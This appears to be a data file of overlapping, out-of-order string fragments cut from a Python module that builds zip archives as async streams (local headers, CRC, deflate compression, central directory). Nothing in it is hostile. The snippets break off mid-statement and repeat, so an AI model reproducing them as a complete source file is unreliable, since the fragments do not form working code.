"self.zinfo.FileHeader(zip64=False) @property def directory_header(self): \"\"\"The file's header, for inclusion in the archive's central",
"is tightly coupled to ZipStreamReader, and should not be used separately \"\"\" def",
"self._buffer = bytearray() super().__init__(*args, **kwargs) @property def size(self): return 0 @asyncio.coroutine def _read(self,",
"endrec = struct.pack( zipfile.structEndArchive, zipfile.stringEndArchive, 0, 0, count, count, len(file_headers), cumulative_offset, 0, )",
"yield from (self.stream()) ret = self._buffer while (n == -1 or len(ret) <",
"(dt[0] - 1980) << 9 | dt[1] << 5 | dt[2] dostime =",
"# Build a ZipInfo instance to use for the file's header and footer",
"0 for file in self.files: file.zinfo.header_offset = cumulative_offset file_headers.append(file.directory_header) cumulative_offset += file.total_bytes file_headers",
"\"\"\"The file's header, for inclusion just before the content stream\"\"\" return self.zinfo.FileHeader(zip64=False) @property",
"b''.join(file_headers) count = len(self.files) endrec = struct.pack( zipfile.structEndArchive, zipfile.stringEndArchive, 0, 0, count, count,",
"0, 0, count, count, len(file_headers), cumulative_offset, 0, ) self.feed_eof() return b''.join((file_headers, endrec)) class",
"file_headers = [] cumulative_offset = 0 for file in self.files: file.zinfo.header_offset = cumulative_offset",
"\"\"\" dt = self.zinfo.date_time # modification date/time, in MSDOS format dosdate = (dt[0]",
"time dosdate, self.zinfo.CRC, self.compressed_size, self.original_size, len(self.zinfo.filename.encode('utf-8')), len(extra_data), len(self.zinfo.comment), 0, self.zinfo.internal_attr, self.zinfo.external_attr, self.zinfo.header_offset, )",
"def _read(self, n=-1): file_headers = [] cumulative_offset = 0 for file in self.files:",
"else zlib.Z_SYNC_FLUSH ) # Update file info self.file.compressed_size += len(compressed) ret += compressed",
"self.stream.at_eof() else zlib.Z_SYNC_FLUSH ) # Update file info self.file.compressed_size += len(compressed) ret +=",
"def _read(self, *args, **kwargs): \"\"\"Create 16 byte descriptor of file CRC, file size,",
"should be access after the file's data has been streamed. \"\"\" return (",
"if n != -1 and len(ret) > n: self._buffer = ret[n:] ret =",
") @property def local_header(self): \"\"\"The file's header, for inclusion just before the content",
"needed to build the footer self.original_size = 0 self.compressed_size = 0 super().__init__( StringStream(self.local_header),",
"directory \"\"\" dt = self.zinfo.date_time # modification date/time, in MSDOS format dosdate =",
"not be used separately \"\"\" def __init__(self, file, stream, *args, **kwargs): self.file =",
"StringStream(self.local_header), ZipLocalFileData(self, stream), ZipLocalFileDescriptor(self), ) @property def local_header(self): \"\"\"The file's header, for inclusion",
"waterbutler.core.streams import MultiStream from waterbutler.core.streams import StringStream class ZipLocalFileDescriptor(BaseStream): \"\"\"The descriptor (footer) for",
"ZipLocalFile(MultiStream): \"\"\"A local file in a zip archive Note: This class is tightly",
"EOF is the buffer and stream are both empty if not self._buffer and",
"@property def size(self): return 0 @asyncio.coroutine def _read(self, n=-1): file_headers = [] cumulative_offset",
"@property def directory_header(self): \"\"\"The file's header, for inclusion in the archive's central directory",
"stream\"\"\" return self.zinfo.FileHeader(zip64=False) @property def directory_header(self): \"\"\"The file's header, for inclusion in the",
"2) extra_data = self.zinfo.extra filename, flag_bits = self.zinfo._encodeFilenameFlags() centdir = struct.pack( zipfile.structCentralDir, zipfile.stringCentralDir,",
"file's header, for inclusion in the archive's central directory \"\"\" dt = self.zinfo.date_time",
"file.zinfo.header_offset = cumulative_offset file_headers.append(file.directory_header) cumulative_offset += file.total_bytes file_headers = b''.join(file_headers) count = len(self.files)",
"class ZipLocalFileData(BaseStream): \"\"\"A thin stream wrapper, used to update a ZipLocalFile as chunks",
"self.zinfo.CRC, self.compressed_size, self.original_size, ) @property def total_bytes(self): \"\"\"Length, in bytes, of output. Includes",
"= [ZipLocalFile(each) for each in streams] # Append a stream for the archive's",
"a single, Zip-compressed stream\"\"\" def __init__(self, *streams): # Each incoming stream should be",
"updated as file is streamed self.zinfo.CRC = 0 # define a compressor self.compressor",
"size(self): return 0 @asyncio.coroutine def _read(self, n=-1): file_headers = [] cumulative_offset = 0",
"*args, **kwargs) # Update file info self.file.original_size += len(chunk) self.file.zinfo.CRC = binascii.crc32(chunk, self.file.zinfo.CRC)",
"= self.zinfo.extra filename, flag_bits = self.zinfo._encodeFilenameFlags() centdir = struct.pack( zipfile.structCentralDir, zipfile.stringCentralDir, self.zinfo.create_version, self.zinfo.create_system,",
"file): super().__init__() self.file = file @property def size(self): return 0 @asyncio.coroutine def _read(self,",
"= ret[n:] ret = ret[:n] else: self._buffer = bytearray() # EOF is the",
"zipfile.structCentralDir, zipfile.stringCentralDir, self.zinfo.create_version, self.zinfo.create_system, self.zinfo.extract_version, self.zinfo.reserved, flag_bits, self.zinfo.compress_type, dostime, # modification time dosdate,",
"= b'PK\\x07\\x08' # magic number for data descriptor return struct.pack( fmt, signature, self.zinfo.CRC,",
"self.stream.at_eof(): chunk = yield from self.stream.read(n, *args, **kwargs) # Update file info self.file.original_size",
"instance streams = [ZipLocalFile(each) for each in streams] # Append a stream for",
"of output. Includes header and footer Note: This should be access after the",
"total_bytes(self): \"\"\"Length, in bytes, of output. Includes header and footer Note: This should",
"<< 5 | dt[2] dostime = dt[3] << 11 | dt[4] << 5",
"@property def local_header(self): \"\"\"The file's header, for inclusion just before the content stream\"\"\"",
"__init__(self, file_tuple): filename, stream = file_tuple filename = filename.strip('/') # Build a ZipInfo",
"= dt[3] << 11 | dt[4] << 5 | (dt[5] // 2) extra_data",
"def __init__(self, *streams): # Each incoming stream should be wrapped in a _ZipFile",
"coupled to ZipStreamReader, and should not be used separately \"\"\" def __init__(self, file_tuple):",
"bytearray() # EOF is the buffer and stream are both empty if not",
"centdir = struct.pack( zipfile.structCentralDir, zipfile.stringCentralDir, self.zinfo.create_version, self.zinfo.create_system, self.zinfo.extract_version, self.zinfo.reserved, flag_bits, self.zinfo.compress_type, dostime, #",
"(self.stream()) ret = self._buffer while (n == -1 or len(ret) < n) and",
"instance to use for the file's header and footer self.zinfo = zipfile.ZipInfo( filename=filename,",
"= [] cumulative_offset = 0 for file in self.files: file.zinfo.header_offset = cumulative_offset file_headers.append(file.directory_header)",
"== -1 or len(ret) < n) and not self.stream.at_eof(): chunk = yield from",
"= file_tuple filename = filename.strip('/') # Build a ZipInfo instance to use for",
"cumulative_offset, 0, ) self.feed_eof() return b''.join((file_headers, endrec)) class ZipStreamReader(MultiStream): \"\"\"Combines one or more",
"= bytearray() # EOF is the buffer and stream are both empty if",
"0 # define a compressor self.compressor = zlib.compressobj( zlib.Z_DEFAULT_COMPRESSION, zlib.DEFLATED, -15, ) #",
"as file is streamed self.zinfo.CRC = 0 # define a compressor self.compressor =",
"5 | dt[2] dostime = dt[3] << 11 | dt[4] << 5 |",
"is the buffer and stream are both empty if not self._buffer and self.stream.at_eof():",
"\"\"\"A local file in a zip archive Note: This class is tightly coupled",
"return self.file.descriptor class ZipLocalFileData(BaseStream): \"\"\"A thin stream wrapper, used to update a ZipLocalFile",
"to ZipStreamReader, and should not be used separately \"\"\" def __init__(self, files, *args,",
"streams] # Append a stream for the archive's footer (central directory) streams.append(ZipArchiveCentralDirectory(streams.copy())) super().__init__(*streams)",
"both empty if not self._buffer and self.stream.at_eof(): self.feed_eof() return bytes(ret) class ZipLocalFile(MultiStream): \"\"\"A",
"self.file = file @property def size(self): return 0 @asyncio.coroutine def _read(self, *args, **kwargs):",
"\"\"\"Length, in bytes, of output. Includes header and footer Note: This should be",
"@asyncio.coroutine def _read(self, n=-1, *args, **kwargs): if callable(self.stream): self.stream = yield from (self.stream())",
"cumulative_offset file_headers.append(file.directory_header) cumulative_offset += file.total_bytes file_headers = b''.join(file_headers) count = len(self.files) endrec =",
"struct.pack( zipfile.structEndArchive, zipfile.stringEndArchive, 0, 0, count, count, len(file_headers), cumulative_offset, 0, ) self.feed_eof() return",
"files, *args, **kwargs): super().__init__() self.files = files @property def size(self): return 0 @asyncio.coroutine",
"0 @asyncio.coroutine def _read(self, n=-1, *args, **kwargs): if callable(self.stream): self.stream = yield from",
"one or more streams into a single, Zip-compressed stream\"\"\" def __init__(self, *streams): #",
"= 0 self.compressed_size = 0 super().__init__( StringStream(self.local_header), ZipLocalFileData(self, stream), ZipLocalFileDescriptor(self), ) @property def",
"= self.zinfo.date_time # modification date/time, in MSDOS format dosdate = (dt[0] - 1980)",
"is streamed self.zinfo.CRC = 0 # define a compressor self.compressor = zlib.compressobj( zlib.Z_DEFAULT_COMPRESSION,",
"@asyncio.coroutine def _read(self, n=-1): file_headers = [] cumulative_offset = 0 for file in",
"len(self.descriptor) ) class ZipArchiveCentralDirectory(BaseStream): \"\"\"The central directory for a zip archive Note: This",
"ZipLocalFileData(self, stream), ZipLocalFileDescriptor(self), ) @property def local_header(self): \"\"\"The file's header, for inclusion just",
"flag_bits = self.zinfo._encodeFilenameFlags() centdir = struct.pack( zipfile.structCentralDir, zipfile.stringCentralDir, self.zinfo.create_version, self.zinfo.create_system, self.zinfo.extract_version, self.zinfo.reserved, flag_bits,",
"= 0 # define a compressor self.compressor = zlib.compressobj( zlib.Z_DEFAULT_COMPRESSION, zlib.DEFLATED, -15, )",
") # meta information - needed to build the footer self.original_size = 0",
"footer self.original_size = 0 self.compressed_size = 0 super().__init__( StringStream(self.local_header), ZipLocalFileData(self, stream), ZipLocalFileDescriptor(self), )",
"return 0 @asyncio.coroutine def _read(self, n=-1, *args, **kwargs): if callable(self.stream): self.stream = yield",
"to ZipStreamReader, and should not be used separately \"\"\" def __init__(self, file_tuple): filename,",
"from waterbutler.core.streams import BaseStream from waterbutler.core.streams import MultiStream from waterbutler.core.streams import StringStream class",
"class is tightly coupled to ZipStreamReader, and should not be used separately \"\"\"",
"**kwargs) @property def size(self): return 0 @asyncio.coroutine def _read(self, n=-1, *args, **kwargs): if",
"from self.stream.read(n, *args, **kwargs) # Update file info self.file.original_size += len(chunk) self.file.zinfo.CRC =",
"True return self.file.descriptor class ZipLocalFileData(BaseStream): \"\"\"A thin stream wrapper, used to update a",
"+= len(chunk) self.file.zinfo.CRC = binascii.crc32(chunk, self.file.zinfo.CRC) # compress compressed = self.file.compressor.compress(chunk) compressed +=",
"return bytes(ret) class ZipLocalFile(MultiStream): \"\"\"A local file in a zip archive Note: This",
"and not self.stream.at_eof(): chunk = yield from self.stream.read(n, *args, **kwargs) # Update file",
"not be used separately \"\"\" def __init__(self, files, *args, **kwargs): super().__init__() self.files =",
"count, len(file_headers), cumulative_offset, 0, ) self.feed_eof() return b''.join((file_headers, endrec)) class ZipStreamReader(MultiStream): \"\"\"Combines one",
"ZipStreamReader, and should not be used separately \"\"\" def __init__(self, file): super().__init__() self.file",
"# Each incoming stream should be wrapped in a _ZipFile instance streams =",
"file info self.file.compressed_size += len(compressed) ret += compressed # buffer any overages if",
"_ZipFile instance streams = [ZipLocalFile(each) for each in streams] # Append a stream",
"dt = self.zinfo.date_time # modification date/time, in MSDOS format dosdate = (dt[0] -",
"import zipfile import zlib from waterbutler.core.streams import BaseStream from waterbutler.core.streams import MultiStream from",
"in streams] # Append a stream for the archive's footer (central directory) streams.append(ZipArchiveCentralDirectory(streams.copy()))",
"if callable(self.stream): self.stream = yield from (self.stream()) ret = self._buffer while (n ==",
"else: self._buffer = bytearray() # EOF is the buffer and stream are both",
"in bytes, of output. Includes header and footer Note: This should be access",
"def __init__(self, files, *args, **kwargs): super().__init__() self.files = files @property def size(self): return",
"waterbutler.core.streams import StringStream class ZipLocalFileDescriptor(BaseStream): \"\"\"The descriptor (footer) for a local file in",
"Includes header and footer Note: This should be access after the file's data",
"> n: self._buffer = ret[n:] ret = ret[:n] else: self._buffer = bytearray() #",
"len(file_headers), cumulative_offset, 0, ) self.feed_eof() return b''.join((file_headers, endrec)) class ZipStreamReader(MultiStream): \"\"\"Combines one or",
"file CRC, file size, and compress size\"\"\" self._eof = True return self.file.descriptor class",
"self.files = files @property def size(self): return 0 @asyncio.coroutine def _read(self, n=-1): file_headers",
"CRC, file size, and compress size\"\"\" self._eof = True return self.file.descriptor class ZipLocalFileData(BaseStream):",
"self.feed_eof() return bytes(ret) class ZipLocalFile(MultiStream): \"\"\"A local file in a zip archive Note:",
"return centdir + filename + extra_data + self.zinfo.comment @property def descriptor(self): \"\"\"Local file",
"len(self.zinfo.comment), 0, self.zinfo.internal_attr, self.zinfo.external_attr, self.zinfo.header_offset, ) return centdir + filename + extra_data +",
"file's header and footer self.zinfo = zipfile.ZipInfo( filename=filename, date_time=time.localtime(time.time())[:6], ) self.zinfo.compress_type = zipfile.ZIP_DEFLATED",
"and should not be used separately \"\"\" def __init__(self, file_tuple): filename, stream =",
"self.zinfo.external_attr, self.zinfo.header_offset, ) return centdir + filename + extra_data + self.zinfo.comment @property def",
"self.zinfo = zipfile.ZipInfo( filename=filename, date_time=time.localtime(time.time())[:6], ) self.zinfo.compress_type = zipfile.ZIP_DEFLATED self.zinfo.external_attr = 0o600 <<",
"(n == -1 or len(ret) < n) and not self.stream.at_eof(): chunk = yield",
"descriptor\"\"\" fmt = '<4sLLL' signature = b'PK\\x07\\x08' # magic number for data descriptor",
"self.zinfo.compress_type = zipfile.ZIP_DEFLATED self.zinfo.external_attr = 0o600 << 16 self.zinfo.header_offset = 0 self.zinfo.flag_bits |=",
"of file CRC, file size, and compress size\"\"\" self._eof = True return self.file.descriptor",
"**kwargs) # Update file info self.file.original_size += len(chunk) self.file.zinfo.CRC = binascii.crc32(chunk, self.file.zinfo.CRC) #",
"file in self.files: file.zinfo.header_offset = cumulative_offset file_headers.append(file.directory_header) cumulative_offset += file.total_bytes file_headers = b''.join(file_headers)",
"before the content stream\"\"\" return self.zinfo.FileHeader(zip64=False) @property def directory_header(self): \"\"\"The file's header, for",
"( len(self.local_header) + self.compressed_size + len(self.descriptor) ) class ZipArchiveCentralDirectory(BaseStream): \"\"\"The central directory for",
"self.file = file self.stream = stream self._buffer = bytearray() super().__init__(*args, **kwargs) @property def",
"zipfile.structEndArchive, zipfile.stringEndArchive, 0, 0, count, count, len(file_headers), cumulative_offset, 0, ) self.feed_eof() return b''.join((file_headers,",
"file, stream, *args, **kwargs): self.file = file self.stream = stream self._buffer = bytearray()",
"inclusion just before the content stream\"\"\" return self.zinfo.FileHeader(zip64=False) @property def directory_header(self): \"\"\"The file's",
"import MultiStream from waterbutler.core.streams import StringStream class ZipLocalFileDescriptor(BaseStream): \"\"\"The descriptor (footer) for a",
"stream should be wrapped in a _ZipFile instance streams = [ZipLocalFile(each) for each",
"signature, self.zinfo.CRC, self.compressed_size, self.original_size, ) @property def total_bytes(self): \"\"\"Length, in bytes, of output.",
"file is streamed self.zinfo.CRC = 0 # define a compressor self.compressor = zlib.compressobj(",
"__init__(self, file): super().__init__() self.file = file @property def size(self): return 0 @asyncio.coroutine def",
"as chunks are read Note: This class is tightly coupled to ZipStreamReader, and",
"= file self.stream = stream self._buffer = bytearray() super().__init__(*args, **kwargs) @property def size(self):",
"self.zinfo.create_version, self.zinfo.create_system, self.zinfo.extract_version, self.zinfo.reserved, flag_bits, self.zinfo.compress_type, dostime, # modification time dosdate, self.zinfo.CRC, self.compressed_size,",
"super().__init__(*args, **kwargs) @property def size(self): return 0 @asyncio.coroutine def _read(self, n=-1, *args, **kwargs):",
"def __init__(self, file_tuple): filename, stream = file_tuple filename = filename.strip('/') # Build a",
"stream self._buffer = bytearray() super().__init__(*args, **kwargs) @property def size(self): return 0 @asyncio.coroutine def",
"\"\"\" def __init__(self, files, *args, **kwargs): super().__init__() self.files = files @property def size(self):",
"<< 5 | (dt[5] // 2) extra_data = self.zinfo.extra filename, flag_bits = self.zinfo._encodeFilenameFlags()",
"ZipLocalFileDescriptor(self), ) @property def local_header(self): \"\"\"The file's header, for inclusion just before the",
"info self.file.compressed_size += len(compressed) ret += compressed # buffer any overages if n",
"self.compressor = zlib.compressobj( zlib.Z_DEFAULT_COMPRESSION, zlib.DEFLATED, -15, ) # meta information - needed to",
"class ZipStreamReader(MultiStream): \"\"\"Combines one or more streams into a single, Zip-compressed stream\"\"\" def",
"be access after the file's data has been streamed. \"\"\" return ( len(self.local_header)",
"MSDOS format dosdate = (dt[0] - 1980) << 9 | dt[1] << 5",
"the file's data has been streamed. \"\"\" return ( len(self.local_header) + self.compressed_size +",
"len(extra_data), len(self.zinfo.comment), 0, self.zinfo.internal_attr, self.zinfo.external_attr, self.zinfo.header_offset, ) return centdir + filename + extra_data",
"Zip-compressed stream\"\"\" def __init__(self, *streams): # Each incoming stream should be wrapped in",
"@property def size(self): return 0 @asyncio.coroutine def _read(self, n=-1, *args, **kwargs): if callable(self.stream):",
"cumulative_offset = 0 for file in self.files: file.zinfo.header_offset = cumulative_offset file_headers.append(file.directory_header) cumulative_offset +=",
"dt[4] << 5 | (dt[5] // 2) extra_data = self.zinfo.extra filename, flag_bits =",
"more streams into a single, Zip-compressed stream\"\"\" def __init__(self, *streams): # Each incoming",
") class ZipArchiveCentralDirectory(BaseStream): \"\"\"The central directory for a zip archive Note: This class",
"= bytearray() super().__init__(*args, **kwargs) @property def size(self): return 0 @asyncio.coroutine def _read(self, n=-1,",
"# compress compressed = self.file.compressor.compress(chunk) compressed += self.file.compressor.flush( zlib.Z_FINISH if self.stream.at_eof() else zlib.Z_SYNC_FLUSH",
"incoming stream should be wrapped in a _ZipFile instance streams = [ZipLocalFile(each) for",
"import asyncio import binascii import struct import time import zipfile import zlib from",
"self.zinfo.flag_bits |= 0x08 # Initial CRC: value will be updated as file is",
"import struct import time import zipfile import zlib from waterbutler.core.streams import BaseStream from",
"# magic number for data descriptor return struct.pack( fmt, signature, self.zinfo.CRC, self.compressed_size, self.original_size,",
"in the archive's central directory \"\"\" dt = self.zinfo.date_time # modification date/time, in",
"def __init__(self, file, stream, *args, **kwargs): self.file = file self.stream = stream self._buffer",
"used separately \"\"\" def __init__(self, file): super().__init__() self.file = file @property def size(self):",
"Each incoming stream should be wrapped in a _ZipFile instance streams = [ZipLocalFile(each)",
"n: self._buffer = ret[n:] ret = ret[:n] else: self._buffer = bytearray() # EOF",
"n) and not self.stream.at_eof(): chunk = yield from self.stream.read(n, *args, **kwargs) # Update",
"CRC: value will be updated as file is streamed self.zinfo.CRC = 0 #",
"len(ret) > n: self._buffer = ret[n:] ret = ret[:n] else: self._buffer = bytearray()",
"modification time dosdate, self.zinfo.CRC, self.compressed_size, self.original_size, len(self.zinfo.filename.encode('utf-8')), len(extra_data), len(self.zinfo.comment), 0, self.zinfo.internal_attr, self.zinfo.external_attr, self.zinfo.header_offset,",
"and len(ret) > n: self._buffer = ret[n:] ret = ret[:n] else: self._buffer =",
"len(ret) < n) and not self.stream.at_eof(): chunk = yield from self.stream.read(n, *args, **kwargs)",
"= zlib.compressobj( zlib.Z_DEFAULT_COMPRESSION, zlib.DEFLATED, -15, ) # meta information - needed to build",
"tightly coupled to ZipStreamReader, and should not be used separately \"\"\" def __init__(self,",
"each in streams] # Append a stream for the archive's footer (central directory)",
"should be wrapped in a _ZipFile instance streams = [ZipLocalFile(each) for each in",
"to ZipStreamReader, and should not be used separately \"\"\" def __init__(self, file, stream,",
"self.stream = yield from (self.stream()) ret = self._buffer while (n == -1 or",
"or more streams into a single, Zip-compressed stream\"\"\" def __init__(self, *streams): # Each",
"used separately \"\"\" def __init__(self, file_tuple): filename, stream = file_tuple filename = filename.strip('/')",
"ZipStreamReader(MultiStream): \"\"\"Combines one or more streams into a single, Zip-compressed stream\"\"\" def __init__(self,",
"not self.stream.at_eof(): chunk = yield from self.stream.read(n, *args, **kwargs) # Update file info",
"cumulative_offset += file.total_bytes file_headers = b''.join(file_headers) count = len(self.files) endrec = struct.pack( zipfile.structEndArchive,",
"wrapper, used to update a ZipLocalFile as chunks are read Note: This class",
"the file's header and footer self.zinfo = zipfile.ZipInfo( filename=filename, date_time=time.localtime(time.time())[:6], ) self.zinfo.compress_type =",
") @property def total_bytes(self): \"\"\"Length, in bytes, of output. Includes header and footer",
"to use for the file's header and footer self.zinfo = zipfile.ZipInfo( filename=filename, date_time=time.localtime(time.time())[:6],",
"build the footer self.original_size = 0 self.compressed_size = 0 super().__init__( StringStream(self.local_header), ZipLocalFileData(self, stream),",
"*args, **kwargs): self.file = file self.stream = stream self._buffer = bytearray() super().__init__(*args, **kwargs)",
"self._buffer while (n == -1 or len(ret) < n) and not self.stream.at_eof(): chunk",
"if not self._buffer and self.stream.at_eof(): self.feed_eof() return bytes(ret) class ZipLocalFile(MultiStream): \"\"\"A local file",
"\"\"\"Local file data descriptor\"\"\" fmt = '<4sLLL' signature = b'PK\\x07\\x08' # magic number",
"16 self.zinfo.header_offset = 0 self.zinfo.flag_bits |= 0x08 # Initial CRC: value will be",
"len(self.local_header) + self.compressed_size + len(self.descriptor) ) class ZipArchiveCentralDirectory(BaseStream): \"\"\"The central directory for a",
"wrapped in a _ZipFile instance streams = [ZipLocalFile(each) for each in streams] #",
"stream), ZipLocalFileDescriptor(self), ) @property def local_header(self): \"\"\"The file's header, for inclusion just before",
"# define a compressor self.compressor = zlib.compressobj( zlib.Z_DEFAULT_COMPRESSION, zlib.DEFLATED, -15, ) # meta",
"0 @asyncio.coroutine def _read(self, *args, **kwargs): \"\"\"Create 16 byte descriptor of file CRC,",
"yield from self.stream.read(n, *args, **kwargs) # Update file info self.file.original_size += len(chunk) self.file.zinfo.CRC",
"\"\"\"The central directory for a zip archive Note: This class is tightly coupled",
"header, for inclusion in the archive's central directory \"\"\" dt = self.zinfo.date_time #",
"-15, ) # meta information - needed to build the footer self.original_size =",
"header and footer Note: This should be access after the file's data has",
"to build the footer self.original_size = 0 self.compressed_size = 0 super().__init__( StringStream(self.local_header), ZipLocalFileData(self,",
"16 byte descriptor of file CRC, file size, and compress size\"\"\" self._eof =",
"signature = b'PK\\x07\\x08' # magic number for data descriptor return struct.pack( fmt, signature,",
"fmt = '<4sLLL' signature = b'PK\\x07\\x08' # magic number for data descriptor return",
"file in a zip archive Note: This class is tightly coupled to ZipStreamReader,",
"# Initial CRC: value will be updated as file is streamed self.zinfo.CRC =",
"\"\"\" def __init__(self, file): super().__init__() self.file = file @property def size(self): return 0",
"ZipArchiveCentralDirectory(BaseStream): \"\"\"The central directory for a zip archive Note: This class is tightly",
"the buffer and stream are both empty if not self._buffer and self.stream.at_eof(): self.feed_eof()",
"def local_header(self): \"\"\"The file's header, for inclusion just before the content stream\"\"\" return",
"- 1980) << 9 | dt[1] << 5 | dt[2] dostime = dt[3]",
"access after the file's data has been streamed. \"\"\" return ( len(self.local_header) +",
"# meta information - needed to build the footer self.original_size = 0 self.compressed_size",
"= cumulative_offset file_headers.append(file.directory_header) cumulative_offset += file.total_bytes file_headers = b''.join(file_headers) count = len(self.files) endrec",
"a zip archive Note: This class is tightly coupled to ZipStreamReader, and should",
"in MSDOS format dosdate = (dt[0] - 1980) << 9 | dt[1] <<",
"not self._buffer and self.stream.at_eof(): self.feed_eof() return bytes(ret) class ZipLocalFile(MultiStream): \"\"\"A local file in",
"= struct.pack( zipfile.structCentralDir, zipfile.stringCentralDir, self.zinfo.create_version, self.zinfo.create_system, self.zinfo.extract_version, self.zinfo.reserved, flag_bits, self.zinfo.compress_type, dostime, # modification",
"for the file's header and footer self.zinfo = zipfile.ZipInfo( filename=filename, date_time=time.localtime(time.time())[:6], ) self.zinfo.compress_type",
"self.compressed_size, self.original_size, ) @property def total_bytes(self): \"\"\"Length, in bytes, of output. Includes header",
"return 0 @asyncio.coroutine def _read(self, *args, **kwargs): \"\"\"Create 16 byte descriptor of file",
"zlib.compressobj( zlib.Z_DEFAULT_COMPRESSION, zlib.DEFLATED, -15, ) # meta information - needed to build the",
"file_headers = b''.join(file_headers) count = len(self.files) endrec = struct.pack( zipfile.structEndArchive, zipfile.stringEndArchive, 0, 0,",
"self.file.zinfo.CRC = binascii.crc32(chunk, self.file.zinfo.CRC) # compress compressed = self.file.compressor.compress(chunk) compressed += self.file.compressor.flush( zlib.Z_FINISH",
"header and footer self.zinfo = zipfile.ZipInfo( filename=filename, date_time=time.localtime(time.time())[:6], ) self.zinfo.compress_type = zipfile.ZIP_DEFLATED self.zinfo.external_attr",
"0, self.zinfo.internal_attr, self.zinfo.external_attr, self.zinfo.header_offset, ) return centdir + filename + extra_data + self.zinfo.comment",
"<< 9 | dt[1] << 5 | dt[2] dostime = dt[3] << 11",
"chunk = yield from self.stream.read(n, *args, **kwargs) # Update file info self.file.original_size +=",
"archive Note: This class is tightly coupled to ZipStreamReader, and should not be",
"file.total_bytes file_headers = b''.join(file_headers) count = len(self.files) endrec = struct.pack( zipfile.structEndArchive, zipfile.stringEndArchive, 0,",
"overages if n != -1 and len(ret) > n: self._buffer = ret[n:] ret",
"def directory_header(self): \"\"\"The file's header, for inclusion in the archive's central directory \"\"\"",
"def size(self): return 0 @asyncio.coroutine def _read(self, n=-1, *args, **kwargs): if callable(self.stream): self.stream",
"import binascii import struct import time import zipfile import zlib from waterbutler.core.streams import",
"def total_bytes(self): \"\"\"Length, in bytes, of output. Includes header and footer Note: This",
"to update a ZipLocalFile as chunks are read Note: This class is tightly",
"in a zip archive Note: This class is tightly coupled to ZipStreamReader, and",
"compress compressed = self.file.compressor.compress(chunk) compressed += self.file.compressor.flush( zlib.Z_FINISH if self.stream.at_eof() else zlib.Z_SYNC_FLUSH )",
"super().__init__() self.file = file @property def size(self): return 0 @asyncio.coroutine def _read(self, *args,",
"should not be used separately \"\"\" def __init__(self, file, stream, *args, **kwargs): self.file",
"descriptor return struct.pack( fmt, signature, self.zinfo.CRC, self.compressed_size, self.original_size, ) @property def total_bytes(self): \"\"\"Length,",
"a local file in a zip archive Note: This class is tightly coupled",
"\"\"\"Combines one or more streams into a single, Zip-compressed stream\"\"\" def __init__(self, *streams):",
"the footer self.original_size = 0 self.compressed_size = 0 super().__init__( StringStream(self.local_header), ZipLocalFileData(self, stream), ZipLocalFileDescriptor(self),",
"ret = ret[:n] else: self._buffer = bytearray() # EOF is the buffer and",
"count = len(self.files) endrec = struct.pack( zipfile.structEndArchive, zipfile.stringEndArchive, 0, 0, count, count, len(file_headers),",
") return centdir + filename + extra_data + self.zinfo.comment @property def descriptor(self): \"\"\"Local",
"compressed = self.file.compressor.compress(chunk) compressed += self.file.compressor.flush( zlib.Z_FINISH if self.stream.at_eof() else zlib.Z_SYNC_FLUSH ) #",
"to ZipStreamReader, and should not be used separately \"\"\" def __init__(self, file): super().__init__()",
"@property def size(self): return 0 @asyncio.coroutine def _read(self, *args, **kwargs): \"\"\"Create 16 byte",
"_read(self, *args, **kwargs): \"\"\"Create 16 byte descriptor of file CRC, file size, and",
"in self.files: file.zinfo.header_offset = cumulative_offset file_headers.append(file.directory_header) cumulative_offset += file.total_bytes file_headers = b''.join(file_headers) count",
"inclusion in the archive's central directory \"\"\" dt = self.zinfo.date_time # modification date/time,",
"self.file.zinfo.CRC) # compress compressed = self.file.compressor.compress(chunk) compressed += self.file.compressor.flush( zlib.Z_FINISH if self.stream.at_eof() else",
"*args, **kwargs): \"\"\"Create 16 byte descriptor of file CRC, file size, and compress",
"not be used separately \"\"\" def __init__(self, file_tuple): filename, stream = file_tuple filename",
"\"\"\"The descriptor (footer) for a local file in a zip archive Note: This",
"separately \"\"\" def __init__(self, file): super().__init__() self.file = file @property def size(self): return",
"0, count, count, len(file_headers), cumulative_offset, 0, ) self.feed_eof() return b''.join((file_headers, endrec)) class ZipStreamReader(MultiStream):",
"self.zinfo.extract_version, self.zinfo.reserved, flag_bits, self.zinfo.compress_type, dostime, # modification time dosdate, self.zinfo.CRC, self.compressed_size, self.original_size, len(self.zinfo.filename.encode('utf-8')),",
"filename.strip('/') # Build a ZipInfo instance to use for the file's header and",
"+ extra_data + self.zinfo.comment @property def descriptor(self): \"\"\"Local file data descriptor\"\"\" fmt =",
"info self.file.original_size += len(chunk) self.file.zinfo.CRC = binascii.crc32(chunk, self.file.zinfo.CRC) # compress compressed = self.file.compressor.compress(chunk)",
"file_tuple filename = filename.strip('/') # Build a ZipInfo instance to use for the",
"local_header(self): \"\"\"The file's header, for inclusion just before the content stream\"\"\" return self.zinfo.FileHeader(zip64=False)",
"for file in self.files: file.zinfo.header_offset = cumulative_offset file_headers.append(file.directory_header) cumulative_offset += file.total_bytes file_headers =",
"class ZipLocalFileDescriptor(BaseStream): \"\"\"The descriptor (footer) for a local file in a zip archive",
"centdir + filename + extra_data + self.zinfo.comment @property def descriptor(self): \"\"\"Local file data",
"# buffer any overages if n != -1 and len(ret) > n: self._buffer",
"size(self): return 0 @asyncio.coroutine def _read(self, *args, **kwargs): \"\"\"Create 16 byte descriptor of",
"used to update a ZipLocalFile as chunks are read Note: This class is",
"= len(self.files) endrec = struct.pack( zipfile.structEndArchive, zipfile.stringEndArchive, 0, 0, count, count, len(file_headers), cumulative_offset,",
"ZipLocalFileData(BaseStream): \"\"\"A thin stream wrapper, used to update a ZipLocalFile as chunks are",
"for inclusion just before the content stream\"\"\" return self.zinfo.FileHeader(zip64=False) @property def directory_header(self): \"\"\"The",
"self.zinfo.date_time # modification date/time, in MSDOS format dosdate = (dt[0] - 1980) <<",
"b'PK\\x07\\x08' # magic number for data descriptor return struct.pack( fmt, signature, self.zinfo.CRC, self.compressed_size,",
"self.zinfo.create_system, self.zinfo.extract_version, self.zinfo.reserved, flag_bits, self.zinfo.compress_type, dostime, # modification time dosdate, self.zinfo.CRC, self.compressed_size, self.original_size,",
"for a local file in a zip archive Note: This class is tightly",
"self.stream.read(n, *args, **kwargs) # Update file info self.file.original_size += len(chunk) self.file.zinfo.CRC = binascii.crc32(chunk,",
"and should not be used separately \"\"\" def __init__(self, file): super().__init__() self.file =",
"+ self.compressed_size + len(self.descriptor) ) class ZipArchiveCentralDirectory(BaseStream): \"\"\"The central directory for a zip",
"[] cumulative_offset = 0 for file in self.files: file.zinfo.header_offset = cumulative_offset file_headers.append(file.directory_header) cumulative_offset",
